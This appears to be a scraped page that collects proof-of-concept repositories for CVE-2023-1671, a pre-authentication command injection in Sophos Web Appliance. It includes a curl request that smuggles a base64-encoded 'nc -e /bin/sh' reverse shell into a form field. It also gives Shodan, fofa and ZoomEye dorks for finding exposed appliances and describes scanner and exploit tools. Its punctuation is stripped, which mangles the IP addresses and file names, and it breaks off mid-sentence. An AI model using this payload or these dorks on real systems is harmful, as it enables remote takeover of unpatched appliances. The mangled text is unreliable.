CVE-2023-1671

Pre-Auth RCE in Sophos Web Appliance

CVE-2023-1671 Pre-Auth RCE in Sophos Web Appliance Poc curl -k --trace-ascii % "19216856108/indexphp?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';nc -e /bin/sh 192168561 4444 #" | base64)" #snip => Send

Sophos Web Appliance pre-auth command injection Vulnerability Scanner

CVE-2023-1671 Vulnerability Scanner Sophos Web Appliance older than version 43104 pre-auth command injection vulnerability This vullnerability exist in the warn-proceed handler that allowing the execution of arbitrary code by a remote hacker Usage bash CVE-2023-1671sh targetstxt Note: Targets should not have http or https Ref

CVE-2023-1671-POC, based on dnslog platform

Dork fofa (title="Sophos Web Appliance" || app="Sophos-Web-Appliance") && title!="Sophos Web Appliance：错误请求" ZoomEye title:"Sophos Web Appliance"-title:"Sophos Web Appliance: Forbidden"-title:"Sophos Web Appliance: Bad Request" Shodan title:"Sophos Web Appliance" Usage python CVE-202

find Proof of concept (PoC) repos for CVEs

CVE Proof of Concept find Proof of concept (PoC) repos for CVEs ______ _ __ ______ ____ ______ / ____/| | / / / ____/ / __ \ ____ / ____/ / / | | / / / __/ / /_/ / / __ \ / / / /___ | |/ / / /___ / ____/ / /_/ // /___ \____/ |___/ /_____/ /_/ \____/ \____/

Exploit to cve-2023-1671. So there is a test and exploitation function. The test sends a ping request to the dnslog domain from the vulnerable site. If the ping passes, the vulnerability exists, if it doesn't, then cve-2023-1671 is missing. The exploit function, on the other hand, sends a request with your command to the server.

Сve-2023-1671 How does cve-2023-1671(cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2023-1671 ) work? /opt/ws/bin/ftsblistpack is a Perl script that calls /opt/ws/bin/sblistpack, which is another Perl script The shell command arguments in it are enclosed in single quotes: $rc += system("$sblistpack '$uri' '$user' '$filetype' '